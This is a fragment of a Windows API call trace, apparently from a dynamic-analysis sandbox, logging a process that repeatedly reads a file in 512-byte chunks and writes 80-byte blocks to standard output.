[0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.541] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.541] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] GetFileType (hFile=0x50) returned 0x1 [0152.541] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.541] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.542] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.542] GetFileType (hFile=0x50) returned 0x1 [0152.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.543] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.543] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.543] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.543] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.543] GetFileType (hFile=0x50) returned 0x1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.543] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.544] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.545] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.546] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.547] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.548] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.549] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.550] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 